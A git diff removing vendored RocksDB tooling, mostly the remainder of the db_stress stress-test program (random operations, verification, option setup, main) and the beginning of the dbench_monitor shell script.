-          column_family_names_[cf] = new_name;
-          thread->shared->ClearColumnFamily(cf);
-          if (!s.ok()) {
-            fprintf(stderr, "creating column family error: %s\n",
-                s.ToString().c_str());
-            std::terminate();
-          }
-          thread->shared->UnlockColumnFamily(cf);
-        }
-      }
-
-#ifndef ROCKSDB_LITE  // Lite does not support GetColumnFamilyMetaData
-      if (FLAGS_compact_files_one_in > 0 &&
-          thread->rand.Uniform(FLAGS_compact_files_one_in) == 0) {
-        auto* random_cf =
-            column_families_[thread->rand.Next() % FLAGS_column_families];
-        rocksdb::ColumnFamilyMetaData cf_meta_data;
-        db_->GetColumnFamilyMetaData(random_cf, &cf_meta_data);
-
-        // Randomly compact up to three consecutive files from a level
-        const int kMaxRetry = 3;
-        for (int attempt = 0; attempt < kMaxRetry; ++attempt) {
-          size_t random_level = thread->rand.Uniform(
-              static_cast<int>(cf_meta_data.levels.size()));
-
-          const auto& files = cf_meta_data.levels[random_level].files;
-          if (files.size() > 0) {
-            size_t random_file_index =
-                thread->rand.Uniform(static_cast<int>(files.size()));
-            if (files[random_file_index].being_compacted) {
-              // Retry as the selected file is currently being compacted
-              continue;
-            }
-
-            std::vector<std::string> input_files;
-            input_files.push_back(files[random_file_index].name);
-            if (random_file_index > 0 &&
-                !files[random_file_index - 1].being_compacted) {
-              input_files.push_back(files[random_file_index - 1].name);
-            }
-            if (random_file_index + 1 < files.size() &&
-                !files[random_file_index + 1].being_compacted) {
-              input_files.push_back(files[random_file_index + 1].name);
-            }
-
-            size_t output_level =
-                std::min(random_level + 1, cf_meta_data.levels.size() - 1);
-            auto s =
-                db_->CompactFiles(CompactionOptions(), random_cf, input_files,
-                                  static_cast<int>(output_level));
-            if (!s.ok()) {
-              printf("Unable to perform CompactFiles(): %s\n",
-                     s.ToString().c_str());
-              thread->stats.AddNumCompactFilesFailed(1);
-            } else {
-              thread->stats.AddNumCompactFilesSucceed(1);
-            }
-            break;
-          }
-        }
-      }
-#endif                // !ROCKSDB_LITE
-
-      const double completed_ratio =
-          static_cast<double>(i) / FLAGS_ops_per_thread;
-      const int64_t base_key = static_cast<int64_t>(
-          completed_ratio * (FLAGS_max_key - FLAGS_active_width));
-      long rand_key = base_key + thread->rand.Next() % FLAGS_active_width;
-      int rand_column_family = thread->rand.Next() % FLAGS_column_families;
-      std::string keystr = Key(rand_key);
-      Slice key = keystr;
-      std::unique_ptr<MutexLock> l;
-      if (!FLAGS_test_batches_snapshots) {
-        l.reset(new MutexLock(
-            shared->GetMutexForKey(rand_column_family, rand_key)));
-      }
-      auto column_family = column_families_[rand_column_family];
-
-      int prob_op = thread->rand.Uniform(100);
-      if (prob_op >= 0 && prob_op < (int)FLAGS_readpercent) {
-        // OPERATION read
-        if (!FLAGS_test_batches_snapshots) {
-          Status s = db_->Get(read_opts, column_family, key, &from_db);
-          if (s.ok()) {
-            // found case
-            thread->stats.AddGets(1, 1);
-          } else if (s.IsNotFound()) {
-            // not found case
-            thread->stats.AddGets(1, 0);
-          } else {
-            // errors case
-            thread->stats.AddErrors(1);
-          }
-        } else {
-          MultiGet(thread, read_opts, column_family, key, &from_db);
-        }
-      } else if ((int)FLAGS_readpercent <= prob_op && prob_op < prefixBound) {
-        // OPERATION prefix scan
-        // keys are 8 bytes long, prefix size is FLAGS_prefix_size. There are
-        // (8 - FLAGS_prefix_size) bytes besides the prefix. So there will
-        // be 2 ^ ((8 - FLAGS_prefix_size) * 8) possible keys with the same
-        // prefix
-        if (!FLAGS_test_batches_snapshots) {
-          Slice prefix = Slice(key.data(), FLAGS_prefix_size);
-          Iterator* iter = db_->NewIterator(read_opts, column_family);
-          int64_t count = 0;
-          for (iter->Seek(prefix);
-               iter->Valid() && iter->key().starts_with(prefix); iter->Next()) {
-            ++count;
-          }
-          assert(count <=
-                 (static_cast<int64_t>(1) << ((8 - FLAGS_prefix_size) * 8)));
-          if (iter->status().ok()) {
-            thread->stats.AddPrefixes(1, static_cast<int>(count));
-          } else {
-            thread->stats.AddErrors(1);
-          }
-          delete iter;
-        } else {
-          MultiPrefixScan(thread, read_opts, column_family, key);
-        }
-      } else if (prefixBound <= prob_op && prob_op < writeBound) {
-        // OPERATION write
-        uint32_t value_base = thread->rand.Next();
-        size_t sz = GenerateValue(value_base, value, sizeof(value));
-        Slice v(value, sz);
-        if (!FLAGS_test_batches_snapshots) {
-          // If the chosen key does not allow overwrite and it already
-          // exists, choose another key.
-          while (!shared->AllowsOverwrite(rand_column_family, rand_key) &&
-                 shared->Exists(rand_column_family, rand_key)) {
-            l.reset();
-            rand_key = thread->rand.Next() % max_key;
-            rand_column_family = thread->rand.Next() % FLAGS_column_families;
-            l.reset(new MutexLock(
-                shared->GetMutexForKey(rand_column_family, rand_key)));
-          }
-
-          keystr = Key(rand_key);
-          key = keystr;
-          column_family = column_families_[rand_column_family];
-
-          if (FLAGS_verify_before_write) {
-            std::string keystr2 = Key(rand_key);
-            Slice k = keystr2;
-            Status s = db_->Get(read_opts, column_family, k, &from_db);
-            if (!VerifyValue(rand_column_family, rand_key, read_opts,
-                             thread->shared, from_db, s, true)) {
-              break;
-            }
-          }
-          shared->Put(rand_column_family, rand_key, value_base);
-          Status s;
-          if (FLAGS_use_merge) {
-            s = db_->Merge(write_opts, column_family, key, v);
-          } else {
-            s = db_->Put(write_opts, column_family, key, v);
-          }
-          if (!s.ok()) {
-            fprintf(stderr, "put or merge error: %s\n", s.ToString().c_str());
-            std::terminate();
-          }
-          thread->stats.AddBytesForWrites(1, sz);
-        } else {
-          MultiPut(thread, write_opts, column_family, key, v, sz);
-        }
-        PrintKeyValue(rand_column_family, static_cast<uint32_t>(rand_key),
-                      value, sz);
-      } else if (writeBound <= prob_op && prob_op < delBound) {
-        // OPERATION delete
-        if (!FLAGS_test_batches_snapshots) {
-          // If the chosen key does not allow overwrite and it does not exist,
-          // choose another key.
-          while (!shared->AllowsOverwrite(rand_column_family, rand_key) &&
-                 !shared->Exists(rand_column_family, rand_key)) {
-            l.reset();
-            rand_key = thread->rand.Next() % max_key;
-            rand_column_family = thread->rand.Next() % FLAGS_column_families;
-            l.reset(new MutexLock(
-                shared->GetMutexForKey(rand_column_family, rand_key)));
-          }
-
-          keystr = Key(rand_key);
-          key = keystr;
-          column_family = column_families_[rand_column_family];
-
-          // Use delete if the key may be overwritten and a single deletion
-          // otherwise.
-          if (shared->AllowsOverwrite(rand_column_family, rand_key)) {
-            shared->Delete(rand_column_family, rand_key);
-            Status s = db_->Delete(write_opts, column_family, key);
-            thread->stats.AddDeletes(1);
-            if (!s.ok()) {
-              fprintf(stderr, "delete error: %s\n", s.ToString().c_str());
-              std::terminate();
-            }
-          } else {
-            shared->SingleDelete(rand_column_family, rand_key);
-            Status s = db_->SingleDelete(write_opts, column_family, key);
-            thread->stats.AddSingleDeletes(1);
-            if (!s.ok()) {
-              fprintf(stderr, "single delete error: %s\n",
-                      s.ToString().c_str());
-              std::terminate();
-            }
-          }
-        } else {
-          MultiDelete(thread, write_opts, column_family, key);
-        }
-      } else if (delBound <= prob_op && prob_op < delRangeBound) {
-        // OPERATION delete range
-        if (!FLAGS_test_batches_snapshots) {
-          std::vector<std::unique_ptr<MutexLock>> range_locks;
-          // delete range does not respect disallowed overwrites. the keys for
-          // which overwrites are disallowed are randomly distributed so it
-          // could be expensive to find a range where each key allows
-          // overwrites.
-          if (rand_key > max_key - FLAGS_range_deletion_width) {
-            l.reset();
-            rand_key = thread->rand.Next() %
-                       (max_key - FLAGS_range_deletion_width + 1);
-            range_locks.emplace_back(new MutexLock(
-                shared->GetMutexForKey(rand_column_family, rand_key)));
-          } else {
-            range_locks.emplace_back(std::move(l));
-          }
-          for (int j = 1; j < FLAGS_range_deletion_width; ++j) {
-            if (((rand_key + j) & ((1 << FLAGS_log2_keys_per_lock) - 1)) == 0) {
-              range_locks.emplace_back(new MutexLock(
-                    shared->GetMutexForKey(rand_column_family, rand_key + j)));
-            }
-          }
-
-          keystr = Key(rand_key);
-          key = keystr;
-          column_family = column_families_[rand_column_family];
-          std::string end_keystr = Key(rand_key + FLAGS_range_deletion_width);
-          Slice end_key = end_keystr;
-          int covered = shared->DeleteRange(
-              rand_column_family, rand_key,
-              rand_key + FLAGS_range_deletion_width);
-          Status s = db_->DeleteRange(write_opts, column_family, key, end_key);
-          if (!s.ok()) {
-            fprintf(stderr, "delete range error: %s\n",
-                    s.ToString().c_str());
-            std::terminate();
-          }
-          thread->stats.AddRangeDeletions(1);
-          thread->stats.AddCoveredByRangeDeletions(covered);
-        }
-      } else {
-        // OPERATION iterate
-        MultiIterate(thread, read_opts, column_family, key);
-      }
-      thread->stats.FinishedSingleOp();
-    }
-
-    thread->stats.Stop();
-  }
-
-  void VerifyDb(ThreadState* thread) const {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    auto shared = thread->shared;
-    const int64_t max_key = shared->GetMaxKey();
-    const int64_t keys_per_thread = max_key / shared->GetNumThreads();
-    int64_t start = keys_per_thread * thread->tid;
-    int64_t end = start + keys_per_thread;
-    if (thread->tid == shared->GetNumThreads() - 1) {
-      end = max_key;
-    }
-    for (size_t cf = 0; cf < column_families_.size(); ++cf) {
-      if (thread->shared->HasVerificationFailedYet()) {
-        break;
-      }
-      if (!thread->rand.OneIn(2)) {
-        // Use iterator to verify this range
-        unique_ptr<Iterator> iter(
-            db_->NewIterator(options, column_families_[cf]));
-        iter->Seek(Key(start));
-        for (auto i = start; i < end; i++) {
-          if (thread->shared->HasVerificationFailedYet()) {
-            break;
-          }
-          // TODO(ljin): update "long" to uint64_t
-          // Reseek when the prefix changes
-          if (i % (static_cast<int64_t>(1) << 8 * (8 - FLAGS_prefix_size)) ==
-              0) {
-            iter->Seek(Key(i));
-          }
-          std::string from_db;
-          std::string keystr = Key(i);
-          Slice k = keystr;
-          Status s = iter->status();
-          if (iter->Valid()) {
-            if (iter->key().compare(k) > 0) {
-              s = Status::NotFound(Slice());
-            } else if (iter->key().compare(k) == 0) {
-              from_db = iter->value().ToString();
-              iter->Next();
-            } else if (iter->key().compare(k) < 0) {
-              VerificationAbort(shared, "An out of range key was found",
-                                static_cast<int>(cf), i);
-            }
-          } else {
-            // The iterator found no value for the key in question, so do not
-            // move to the next item in the iterator
-            s = Status::NotFound(Slice());
-          }
-          VerifyValue(static_cast<int>(cf), i, options, shared, from_db, s,
-                      true);
-          if (from_db.length()) {
-            PrintKeyValue(static_cast<int>(cf), static_cast<uint32_t>(i),
-                          from_db.data(), from_db.length());
-          }
-        }
-      } else {
-        // Use Get to verify this range
-        for (auto i = start; i < end; i++) {
-          if (thread->shared->HasVerificationFailedYet()) {
-            break;
-          }
-          std::string from_db;
-          std::string keystr = Key(i);
-          Slice k = keystr;
-          Status s = db_->Get(options, column_families_[cf], k, &from_db);
-          VerifyValue(static_cast<int>(cf), i, options, shared, from_db, s,
-                      true);
-          if (from_db.length()) {
-            PrintKeyValue(static_cast<int>(cf), static_cast<uint32_t>(i),
-                          from_db.data(), from_db.length());
-          }
-        }
-      }
-    }
-  }
-
-  void VerificationAbort(SharedState* shared, std::string msg, int cf,
-                         int64_t key) const {
-    printf("Verification failed for column family %d key %" PRIi64 ": %s\n", cf, key,
-           msg.c_str());
-    shared->SetVerificationFailure();
-  }
-
-  bool VerifyValue(int cf, int64_t key, const ReadOptions& opts,
-                   SharedState* shared, const std::string& value_from_db,
-                   Status s, bool strict = false) const {
-    if (shared->HasVerificationFailedYet()) {
-      return false;
-    }
-    // compare value_from_db with the value in the shared state
-    char value[kValueMaxLen];
-    uint32_t value_base = shared->Get(cf, key);
-    if (value_base == SharedState::SENTINEL && !strict) {
-      return true;
-    }
-
-    if (s.ok()) {
-      if (value_base == SharedState::SENTINEL) {
-        VerificationAbort(shared, "Unexpected value found", cf, key);
-        return false;
-      }
-      size_t sz = GenerateValue(value_base, value, sizeof(value));
-      if (value_from_db.length() != sz) {
-        VerificationAbort(shared, "Length of value read is not equal", cf, key);
-        return false;
-      }
-      if (memcmp(value_from_db.data(), value, sz) != 0) {
-        VerificationAbort(shared, "Contents of value read don't match", cf,
-                          key);
-        return false;
-      }
-    } else {
-      if (value_base != SharedState::SENTINEL) {
-        VerificationAbort(shared, "Value not found: " + s.ToString(), cf, key);
-        return false;
-      }
-    }
-    return true;
-  }
-
-  static void PrintKeyValue(int cf, int64_t key, const char* value,
-                            size_t sz) {
-    if (!FLAGS_verbose) {
-      return;
-    }
-    fprintf(stdout, "[CF %d] %" PRIi64 " == > (%" ROCKSDB_PRIszt ") ", cf, key, sz);
-    for (size_t i = 0; i < sz; i++) {
-      fprintf(stdout, "%X", value[i]);
-    }
-    fprintf(stdout, "\n");
-  }
-
-  static size_t GenerateValue(uint32_t rand, char *v, size_t max_sz) {
-    size_t value_sz =
-        ((rand % kRandomValueMaxFactor) + 1) * FLAGS_value_size_mult;
-    assert(value_sz <= max_sz && value_sz >= sizeof(uint32_t));
-    *((uint32_t*)v) = rand;
-    for (size_t i=sizeof(uint32_t); i < value_sz; i++) {
-      v[i] = (char)(rand ^ i);
-    }
-    v[value_sz] = '\0';
-    return value_sz; // the size of the value set.
-  }
-
-  void PrintEnv() const {
-    fprintf(stdout, "RocksDB version           : %d.%d\n", kMajorVersion,
-            kMinorVersion);
-    fprintf(stdout, "Column families           : %d\n", FLAGS_column_families);
-    if (!FLAGS_test_batches_snapshots) {
-      fprintf(stdout, "Clear CFs one in          : %d\n",
-              FLAGS_clear_column_family_one_in);
-    }
-    fprintf(stdout, "Number of threads         : %d\n", FLAGS_threads);
-    fprintf(stdout, "Ops per thread            : %lu\n",
-            (unsigned long)FLAGS_ops_per_thread);
-    std::string ttl_state("unused");
-    if (FLAGS_ttl > 0) {
-      ttl_state = NumberToString(FLAGS_ttl);
-    }
-    fprintf(stdout, "Time to live(sec)         : %s\n", ttl_state.c_str());
-    fprintf(stdout, "Read percentage           : %d%%\n", FLAGS_readpercent);
-    fprintf(stdout, "Prefix percentage         : %d%%\n", FLAGS_prefixpercent);
-    fprintf(stdout, "Write percentage          : %d%%\n", FLAGS_writepercent);
-    fprintf(stdout, "Delete percentage         : %d%%\n", FLAGS_delpercent);
-    fprintf(stdout, "Delete range percentage   : %d%%\n", FLAGS_delrangepercent);
-    fprintf(stdout, "No overwrite percentage   : %d%%\n",
-            FLAGS_nooverwritepercent);
-    fprintf(stdout, "Iterate percentage        : %d%%\n", FLAGS_iterpercent);
-    fprintf(stdout, "DB-write-buffer-size      : %" PRIu64 "\n",
-            FLAGS_db_write_buffer_size);
-    fprintf(stdout, "Write-buffer-size         : %d\n",
-            FLAGS_write_buffer_size);
-    fprintf(stdout, "Iterations                : %lu\n",
-            (unsigned long)FLAGS_num_iterations);
-    fprintf(stdout, "Max key                   : %lu\n",
-            (unsigned long)FLAGS_max_key);
-    fprintf(stdout, "Ratio #ops/#keys          : %f\n",
-            (1.0 * FLAGS_ops_per_thread * FLAGS_threads) / FLAGS_max_key);
-    fprintf(stdout, "Num times DB reopens      : %d\n", FLAGS_reopen);
-    fprintf(stdout, "Batches/snapshots         : %d\n",
-            FLAGS_test_batches_snapshots);
-    fprintf(stdout, "Do update in place        : %d\n", FLAGS_in_place_update);
-    fprintf(stdout, "Num keys per lock         : %d\n",
-            1 << FLAGS_log2_keys_per_lock);
-    std::string compression = CompressionTypeToString(FLAGS_compression_type_e);
-    fprintf(stdout, "Compression               : %s\n", compression.c_str());
-    std::string checksum = ChecksumTypeToString(FLAGS_checksum_type_e);
-    fprintf(stdout, "Checksum type             : %s\n", checksum.c_str());
-    fprintf(stdout, "Max subcompactions        : %" PRIu64 "\n",
-            FLAGS_subcompactions);
-
-    const char* memtablerep = "";
-    switch (FLAGS_rep_factory) {
-      case kSkipList:
-        memtablerep = "skip_list";
-        break;
-      case kHashSkipList:
-        memtablerep = "prefix_hash";
-        break;
-      case kVectorRep:
-        memtablerep = "vector";
-        break;
-    }
-
-    fprintf(stdout, "Memtablerep               : %s\n", memtablerep);
-
-    fprintf(stdout, "Test kill odd             : %d\n", rocksdb_kill_odds);
-    if (!rocksdb_kill_prefix_blacklist.empty()) {
-      fprintf(stdout, "Skipping kill points prefixes:\n");
-      for (auto& p : rocksdb_kill_prefix_blacklist) {
-        fprintf(stdout, "  %s\n", p.c_str());
-      }
-    }
-
-    fprintf(stdout, "------------------------------------------------\n");
-  }
-
-  void Open() {
-    assert(db_ == nullptr);
-    BlockBasedTableOptions block_based_options;
-    block_based_options.block_cache = cache_;
-    block_based_options.block_cache_compressed = compressed_cache_;
-    block_based_options.checksum = FLAGS_checksum_type_e;
-    block_based_options.block_size = FLAGS_block_size;
-    block_based_options.format_version = 2;
-    block_based_options.filter_policy = filter_policy_;
-    options_.table_factory.reset(
-        NewBlockBasedTableFactory(block_based_options));
-    options_.db_write_buffer_size = FLAGS_db_write_buffer_size;
-    options_.write_buffer_size = FLAGS_write_buffer_size;
-    options_.max_write_buffer_number = FLAGS_max_write_buffer_number;
-    options_.min_write_buffer_number_to_merge =
-        FLAGS_min_write_buffer_number_to_merge;
-    options_.max_write_buffer_number_to_maintain =
-        FLAGS_max_write_buffer_number_to_maintain;
-    options_.memtable_prefix_bloom_size_ratio =
-        FLAGS_memtable_prefix_bloom_size_ratio;
-    options_.max_background_compactions = FLAGS_max_background_compactions;
-    options_.max_background_flushes = FLAGS_max_background_flushes;
-    options_.compaction_style =
-        static_cast<rocksdb::CompactionStyle>(FLAGS_compaction_style);
-    options_.prefix_extractor.reset(NewFixedPrefixTransform(FLAGS_prefix_size));
-    options_.max_open_files = FLAGS_open_files;
-    options_.statistics = dbstats;
-    options_.env = FLAGS_env;
-    options_.use_fsync = FLAGS_use_fsync;
-    options_.compaction_readahead_size = FLAGS_compaction_readahead_size;
-    options_.allow_mmap_reads = FLAGS_mmap_read;
-    options_.allow_mmap_writes = FLAGS_mmap_write;
-    options_.use_direct_reads = FLAGS_use_direct_reads;
-    options_.use_direct_io_for_flush_and_compaction =
-        FLAGS_use_direct_io_for_flush_and_compaction;
-    options_.target_file_size_base = FLAGS_target_file_size_base;
-    options_.target_file_size_multiplier = FLAGS_target_file_size_multiplier;
-    options_.max_bytes_for_level_base = FLAGS_max_bytes_for_level_base;
-    options_.max_bytes_for_level_multiplier =
-        FLAGS_max_bytes_for_level_multiplier;
-    options_.level0_stop_writes_trigger = FLAGS_level0_stop_writes_trigger;
-    options_.level0_slowdown_writes_trigger =
-        FLAGS_level0_slowdown_writes_trigger;
-    options_.level0_file_num_compaction_trigger =
-        FLAGS_level0_file_num_compaction_trigger;
-    options_.compression = FLAGS_compression_type_e;
-    options_.create_if_missing = true;
-    options_.max_manifest_file_size = 10 * 1024;
-    options_.inplace_update_support = FLAGS_in_place_update;
-    options_.max_subcompactions = static_cast<uint32_t>(FLAGS_subcompactions);
-    options_.allow_concurrent_memtable_write =
-        FLAGS_allow_concurrent_memtable_write;
-    options_.enable_write_thread_adaptive_yield =
-        FLAGS_enable_write_thread_adaptive_yield;
-    if (FLAGS_rate_limiter_bytes_per_sec > 0) {
-      options_.rate_limiter.reset(NewGenericRateLimiter(
-          FLAGS_rate_limiter_bytes_per_sec, 1000 /* refill_period_us */,
-          10 /* fairness */,
-          FLAGS_rate_limit_bg_reads ? RateLimiter::Mode::kReadsOnly
-                                    : RateLimiter::Mode::kWritesOnly));
-      if (FLAGS_rate_limit_bg_reads) {
-        options_.new_table_reader_for_compaction_inputs = true;
-      }
-    }
-
-    if (FLAGS_prefix_size == 0 && FLAGS_rep_factory == kHashSkipList) {
-      fprintf(stderr,
-              "prefeix_size cannot be zero if memtablerep == prefix_hash\n");
-      exit(1);
-    }
-    if (FLAGS_prefix_size != 0 && FLAGS_rep_factory != kHashSkipList) {
-      fprintf(stderr,
-              "WARNING: prefix_size is non-zero but "
-              "memtablerep != prefix_hash\n");
-    }
-    switch (FLAGS_rep_factory) {
-      case kSkipList:
-        // no need to do anything
-        break;
-#ifndef ROCKSDB_LITE
-      case kHashSkipList:
-        options_.memtable_factory.reset(NewHashSkipListRepFactory(10000));
-        break;
-      case kVectorRep:
-        options_.memtable_factory.reset(new VectorRepFactory());
-        break;
-#else
-      default:
-        fprintf(stderr,
-                "RocksdbLite only supports skip list mem table. Skip "
-                "--rep_factory\n");
-#endif  // ROCKSDB_LITE
-    }
-
-    if (FLAGS_use_full_merge_v1) {
-      options_.merge_operator = MergeOperators::CreateDeprecatedPutOperator();
-    } else {
-      options_.merge_operator = MergeOperators::CreatePutOperator();
-    }
-
-    // set universal style compaction configurations, if applicable
-    if (FLAGS_universal_size_ratio != 0) {
-      options_.compaction_options_universal.size_ratio =
-          FLAGS_universal_size_ratio;
-    }
-    if (FLAGS_universal_min_merge_width != 0) {
-      options_.compaction_options_universal.min_merge_width =
-          FLAGS_universal_min_merge_width;
-    }
-    if (FLAGS_universal_max_merge_width != 0) {
-      options_.compaction_options_universal.max_merge_width =
-          FLAGS_universal_max_merge_width;
-    }
-    if (FLAGS_universal_max_size_amplification_percent != 0) {
-      options_.compaction_options_universal.max_size_amplification_percent =
-          FLAGS_universal_max_size_amplification_percent;
-    }
-
-    fprintf(stdout, "DB path: [%s]\n", FLAGS_db.c_str());
-
-    Status s;
-    if (FLAGS_ttl == -1) {
-      std::vector<std::string> existing_column_families;
-      s = DB::ListColumnFamilies(DBOptions(options_), FLAGS_db,
-                                 &existing_column_families);  // ignore errors
-      if (!s.ok()) {
-        // DB doesn't exist
-        assert(existing_column_families.empty());
-        assert(column_family_names_.empty());
-        column_family_names_.push_back(kDefaultColumnFamilyName);
-      } else if (column_family_names_.empty()) {
-        // this is the first call to the function Open()
-        column_family_names_ = existing_column_families;
-      } else {
-        // this is a reopen. just assert that existing column_family_names are
-        // equivalent to what we remember
-        auto sorted_cfn = column_family_names_;
-        std::sort(sorted_cfn.begin(), sorted_cfn.end());
-        std::sort(existing_column_families.begin(),
-                  existing_column_families.end());
-        if (sorted_cfn != existing_column_families) {
-          fprintf(stderr,
-                  "Expected column families differ from the existing:\n");
-          printf("Expected: {");
-          for (auto cf : sorted_cfn) {
-            printf("%s ", cf.c_str());
-          }
-          printf("}\n");
-          printf("Existing: {");
-          for (auto cf : existing_column_families) {
-            printf("%s ", cf.c_str());
-          }
-          printf("}\n");
-        }
-        assert(sorted_cfn == existing_column_families);
-      }
-      std::vector<ColumnFamilyDescriptor> cf_descriptors;
-      for (auto name : column_family_names_) {
-        if (name != kDefaultColumnFamilyName) {
-          new_column_family_name_ =
-              std::max(new_column_family_name_.load(), std::stoi(name) + 1);
-        }
-        cf_descriptors.emplace_back(name, ColumnFamilyOptions(options_));
-      }
-      while (cf_descriptors.size() < (size_t)FLAGS_column_families) {
-        std::string name = ToString(new_column_family_name_.load());
-        new_column_family_name_++;
-        cf_descriptors.emplace_back(name, ColumnFamilyOptions(options_));
-        column_family_names_.push_back(name);
-      }
-      options_.listeners.clear();
-      options_.listeners.emplace_back(
-          new DbStressListener(FLAGS_db, options_.db_paths));
-      options_.create_missing_column_families = true;
-      s = DB::Open(DBOptions(options_), FLAGS_db, cf_descriptors,
-                   &column_families_, &db_);
-      assert(!s.ok() || column_families_.size() ==
-                            static_cast<size_t>(FLAGS_column_families));
-    } else {
-#ifndef ROCKSDB_LITE
-      DBWithTTL* db_with_ttl;
-      s = DBWithTTL::Open(options_, FLAGS_db, &db_with_ttl, FLAGS_ttl);
-      db_ = db_with_ttl;
-#else
-      fprintf(stderr, "TTL is not supported in RocksDBLite\n");
-      exit(1);
-#endif
-    }
-    if (!s.ok()) {
-      fprintf(stderr, "open error: %s\n", s.ToString().c_str());
-      exit(1);
-    }
-  }
-
-  void Reopen() {
-    for (auto cf : column_families_) {
-      delete cf;
-    }
-    column_families_.clear();
-    delete db_;
-    db_ = nullptr;
-
-    num_times_reopened_++;
-    auto now = FLAGS_env->NowMicros();
-    fprintf(stdout, "%s Reopening database for the %dth time\n",
-            FLAGS_env->TimeToString(now/1000000).c_str(),
-            num_times_reopened_);
-    Open();
-  }
-
-  void PrintStatistics() {
-    if (dbstats) {
-      fprintf(stdout, "STATISTICS:\n%s\n", dbstats->ToString().c_str());
-    }
-  }
-
- private:
-  std::shared_ptr<Cache> cache_;
-  std::shared_ptr<Cache> compressed_cache_;
-  std::shared_ptr<const FilterPolicy> filter_policy_;
-  DB* db_;
-  Options options_;
-  std::vector<ColumnFamilyHandle*> column_families_;
-  std::vector<std::string> column_family_names_;
-  std::atomic<int> new_column_family_name_;
-  int num_times_reopened_;
-  std::unordered_map<std::string, std::vector<std::string>> options_table_;
-  std::vector<std::string> options_index_;
-};
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                  " [OPTIONS]...");
-  ParseCommandLineFlags(&argc, &argv, true);
-#if !defined(NDEBUG) && !defined(OS_MACOSX) && !defined(OS_WIN) && \
-  !defined(OS_SOLARIS) && !defined(OS_AIX)
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-    "NewWritableFile:O_DIRECT", [&](void* arg) {
-      int* val = static_cast<int*>(arg);
-      *val &= ~O_DIRECT;
-    });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-    "NewRandomAccessFile:O_DIRECT", [&](void* arg) {
-      int* val = static_cast<int*>(arg);
-      *val &= ~O_DIRECT;
-    });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-#endif
-
-  if (FLAGS_statistics) {
-    dbstats = rocksdb::CreateDBStatistics();
-  }
-  FLAGS_compression_type_e =
-    StringToCompressionType(FLAGS_compression_type.c_str());
-  FLAGS_checksum_type_e = StringToChecksumType(FLAGS_checksum_type.c_str());
-  if (!FLAGS_hdfs.empty()) {
-    FLAGS_env  = new rocksdb::HdfsEnv(FLAGS_hdfs);
-  }
-  FLAGS_rep_factory = StringToRepFactory(FLAGS_memtablerep.c_str());
-
-  // The number of background threads should be at least as much the
-  // max number of concurrent compactions.
-  FLAGS_env->SetBackgroundThreads(FLAGS_max_background_compactions);
-  FLAGS_env->SetBackgroundThreads(FLAGS_num_bottom_pri_threads,
-                                  rocksdb::Env::Priority::BOTTOM);
-  if (FLAGS_prefixpercent > 0 && FLAGS_prefix_size <= 0) {
-    fprintf(stderr,
-            "Error: prefixpercent is non-zero while prefix_size is "
-            "not positive!\n");
-    exit(1);
-  }
-  if (FLAGS_test_batches_snapshots && FLAGS_prefix_size <= 0) {
-    fprintf(stderr,
-            "Error: please specify prefix_size for "
-            "test_batches_snapshots test!\n");
-    exit(1);
-  }
-  if (FLAGS_memtable_prefix_bloom_size_ratio > 0.0 && FLAGS_prefix_size <= 0) {
-    fprintf(stderr,
-            "Error: please specify positive prefix_size in order to use "
-            "memtable_prefix_bloom_size_ratio\n");
-    exit(1);
-  }
-  if ((FLAGS_readpercent + FLAGS_prefixpercent +
-       FLAGS_writepercent + FLAGS_delpercent + FLAGS_delrangepercent +
-       FLAGS_iterpercent) != 100) {
-      fprintf(stderr,
-              "Error: Read+Prefix+Write+Delete+DeleteRange+Iterate percents != "
-              "100!\n");
-      exit(1);
-  }
-  if (FLAGS_disable_wal == 1 && FLAGS_reopen > 0) {
-      fprintf(stderr, "Error: Db cannot reopen safely with disable_wal set!\n");
-      exit(1);
-  }
-  if ((unsigned)FLAGS_reopen >= FLAGS_ops_per_thread) {
-      fprintf(stderr,
-              "Error: #DB-reopens should be < ops_per_thread\n"
-              "Provided reopens = %d and ops_per_thread = %lu\n",
-              FLAGS_reopen,
-              (unsigned long)FLAGS_ops_per_thread);
-      exit(1);
-  }
-  if (FLAGS_test_batches_snapshots && FLAGS_delrangepercent > 0) {
-    fprintf(stderr, "Error: nonzero delrangepercent unsupported in "
-                    "test_batches_snapshots mode\n");
-    exit(1);
-  }
-  if (FLAGS_active_width > FLAGS_max_key) {
-    fprintf(stderr, "Error: active_width can be at most max_key\n");
-    exit(1);
-  } else if (FLAGS_active_width == 0) {
-    FLAGS_active_width = FLAGS_max_key;
-  }
-  if (FLAGS_value_size_mult * kRandomValueMaxFactor > kValueMaxLen) {
-    fprintf(stderr, "Error: value_size_mult can be at most %d\n",
-            kValueMaxLen / kRandomValueMaxFactor);
-    exit(1);
-  }
-
-  // Choose a location for the test database if none given with --db=<path>
-  if (FLAGS_db.empty()) {
-      std::string default_db_path;
-      rocksdb::Env::Default()->GetTestDirectory(&default_db_path);
-      default_db_path += "/dbstress";
-      FLAGS_db = default_db_path;
-  }
-
-  rocksdb_kill_odds = FLAGS_kill_random_test;
-  rocksdb_kill_prefix_blacklist = SplitString(FLAGS_kill_prefix_blacklist);
-
-  rocksdb::StressTest stress;
-  if (stress.Run()) {
-    return 0;
-  } else {
-    return 1;
-  }
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/tools/dbench_monitor b/thirdparty/rocksdb/tools/dbench_monitor
deleted file mode 100755
index d85f9d0..0000000
--- a/thirdparty/rocksdb/tools/dbench_monitor
+++ /dev/null
@@ -1,102 +0,0 @@
-#!/usr/bin/env bash
-#
-#(c) 2004-present, Facebook Inc. All rights reserved.
-#
-#see LICENSE file for more information on use/redistribution rights.
-#
-
-#
-#dbench_monitor: monitor db_bench process for violation of memory utilization
-#
-#default usage will monitor 'virtual memory size'. See below for standard options
-#passed to db_bench during this test.
-#
-# See also: ./pflag for the actual monitoring script that does the work
-#
-#NOTE:
-#  You may end up with some /tmp/ files if db_bench OR
-#  this script OR ./pflag was killed unceremoniously
-#
-#  If you see the script taking a long time, trying "kill"
-#  will usually cleanly exit.
-#
-#
-DIR=`dirname $0`
-LOG=/tmp/`basename $0`.$$
-DB_BENCH="$DIR/../db_bench";
-PFLAG=${DIR}/pflag
-
-usage() {
-    cat <<HELP; exit
-
-Usage: $0  [-h]
-
--h: prints this help message
-
